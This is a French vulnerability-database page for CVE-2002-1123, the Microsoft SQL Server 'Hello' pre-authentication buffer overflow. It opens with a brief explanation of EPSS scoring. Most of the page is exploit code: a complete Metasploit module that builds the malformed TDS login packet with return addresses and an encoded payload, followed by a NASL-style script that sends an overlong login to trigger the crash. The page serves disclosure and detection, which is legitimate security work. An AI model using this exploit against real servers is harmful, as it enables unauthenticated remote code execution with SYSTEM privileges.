CVE-2002-1123 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # $Id: ms02_056_hello.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server Hello Overflow', 'Description' => %q{ By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3). }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2002-1123'], [ 'OSVDB', '10132'], [ 'BID', '5411'], [ 'MSB', 'MS02-056'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', 'Rets' => [0x42b68aba, 0x42d01e50], }, ], ], 'Platform' => 'win', 'DisclosureDate' => 'Aug 5 2002', 'DefaultTarget' => 0)) end def check info = mssql_ping if (info['ServerName']) print_status("SQL Server Information:") info.each_pair { |k,v| print_status(" #{k + (" " * (15-k.length))} = #{v}") } return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect buf = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b" + "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" + "\x10\x00\x00\x00" + rand_text_english(528, payload_badchars) + "\x1B\xA5\xEE\x34" + rand_text_english(4, payload_badchars) + [ target['Rets'][0] ].pack('V') + [ target['Rets'][1], target['Rets'][1] ].pack('VV') + '3333' + [ target['Rets'][1], target['Rets'][1] ].pack('VV') + rand_text_english(88, payload_badchars) + payload.encoded + "\x00\x24\x01\x00\x00" sock.put(buf) handler disconnect end end

source: https://www.securityfocus.com/bid/5411/info A vulnerability has been discovered in Microsoft SQL Server that could make it possible for remote attackers to gain access to target hosts. It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process. This vulnerability reportedly occurs even before authentication can proceed. ## # # this script tests for the "You had me at hello" overflow # in MSSQL (tcp/1433) # Copyright Dave Aitel (2002) # Bug found by: Dave Aitel (2002) # ## #TODO: #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! if(description) { script_id(11067); # script_cve_id("CVE-2000-0402"); script_version ("$Revision: 0.1 $"); name["english"] = "Microsoft SQL Server Hello Overflow"; script_name(english:name["english"]); desc["english"] = " The remote MS SQL server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "Microsoft SQL Server Hello Overflow"; script_summary(english:summary["english"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel"); family["english"] = "Windows"; script_family(english:family["english"]); script_require_ports(1433); exit(0); } # # The script code starts here # #taken from mssql.spk pkt_hdr = raw_string( 0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b ,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03 ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02 ,0x10 ,0x00 ,0x00 ,0x00 ); #taken from mssql.spk pkt_tail = raw_string ( 0x00 ,0x24 ,0x01 ,0x00 ,0x00 ); #techically we should also go to the UDP 1434 resolver service #and get any additional ports!!! port = 1433; found = 0; report = "The SQL Server is vulnerable to the Hello overflow. An attacker may use this flaw to execute commands against the remote host as LOCAL/SYSTEM, as well as read your database content. Solution : disable this service (Microsoft SQL Server). Risk factor : High"; if(get_port_state(port)) { soc = open_sock_tcp(port); if(soc) { #uncomment this to see what normally happens #attack_string="MSSQLServer"; #uncomment next line to actually test for overflow attack_string=crap(560); # this creates a variable called sql_packet sql_packet = pkt_hdr+attack_string+pkt_tail; send(socket:soc, data:sql_packet); r = recv(socket:soc, length:4096); close(soc); display ("Result:",r,"\n"); if(!r) { display("Security Hole in MSSQL\n"); security_hole(port:port, data:report); } } }